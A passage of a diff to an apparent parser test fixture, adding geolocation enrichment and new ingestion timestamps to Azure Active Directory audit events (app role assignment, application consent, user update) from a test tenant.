APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6143,6 +6539,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6312,7 +6720,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125024300Z", + "ingested": "2021-12-14T14:48:43.176657987Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationI
d\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, 
PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6339,6 +6747,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6508,7 +6928,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125029500Z", + "ingested": "2021-12-14T14:48:43.176658775Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationI
d\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, 
PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6534,9 +6954,6 @@ } }, { - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "AzureActiveDirectoryEventType": "1", 
@@ -6672,7 +7089,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:41:51.125033900Z", + "ingested": "2021-12-14T14:48:43.176659423Z", "original": "{\"Actor\":[{\"ID\":\"fim_password_service@support.onmicrosoft.com\",\"Type\":5},{\"ID\":\"100300008060F582\",\"Type\":3},{\"ID\":\"User_00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"00000000-0000-0000-0000-000000000000\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\",\"ActorIpAddress\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"\",\"CreationTime\":\"2020-02-10T15:15:04\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"d51ef8df-6617-4356-b8d4-89ad7efef31e\"},{\"Name\":\"actorObjectId\",\"Value\":\"00000000-0000-0000-0000-000000000000\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"fim_password_service@support.onmicrosoft.com\"},{\"Name\":\"actorPUID\",\"Value\":\"100300008060F582\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"StrongAuthenticationPhoneAppDetail\\\",\\\"TargetId.UserType\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"4aa56c6c-8fa5-4787-a165-03f181541438\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"UserType\\\":\\\"Member\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEve
nt\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:15:04.2043419Z\"},{\"Name\":\"env_epoch\",\"Value\":\"4QPHR\"},{\"Name\":\"env_seqNum\",\"Value\":\"87075075\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000_00000000-0000-0000-0000-000000000000\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"becwebservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"becwebservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RBWSR554\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"83c924c1-f2e2-4b39-8eda-b80c3823a875\",\"ModifiedProperties\":[{\"Name\":\"StrongAuthenticationPhoneAppDetail\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n \\\"OathTokenTimeDrift\\\": -1,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"DeviceName\\\": \\\"NO_DEVICE\\\",\\r\\n \\\"DeviceToken\\\": \\\"NO_DEVICE_TOKEN\\\",\\r\\n \\\"DeviceTag\\\": \\\"SoftwareTokenActivated\\\",\\r\\n \\\"PhoneAppVersion\\\": \\\"NO_PHONE_APP_VERSION\\\",\\r\\n 
\\\"OathTokenTimeDrift\\\": 0,\\r\\n \\\"DeviceId\\\": null,\\r\\n \\\"Id\\\": \\\"3b539b10-3846-4f9b-877d-55b0b8e76147\\\",\\r\\n \\\"TimeInterval\\\": null,\\r\\n \\\"AuthenticationType\\\": 2,\\r\\n \\\"NotificationType\\\": 1,\\r\\n \\\"SecuredPartitionId\\\": 0,\\r\\n \\\"SecuredKeyId\\\": 0\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"StrongAuthenticationPhoneAppDetail\",\"OldValue\":\"\"},{\"Name\":\"TargetId.UserType\",\"NewValue\":\"Member\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Update user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"fim_password_service@support.onmicrosoft.com\",\"UserKey\":\"100300008060F582@support.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6701,10 +7118,25 @@ "email": "asr@testsiem.onmicrosoft.com", "domain": "testsiem.onmicrosoft.com" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -6871,7 +7303,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125038400Z", + "ingested": "2021-12-14T14:48:43.176660134Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
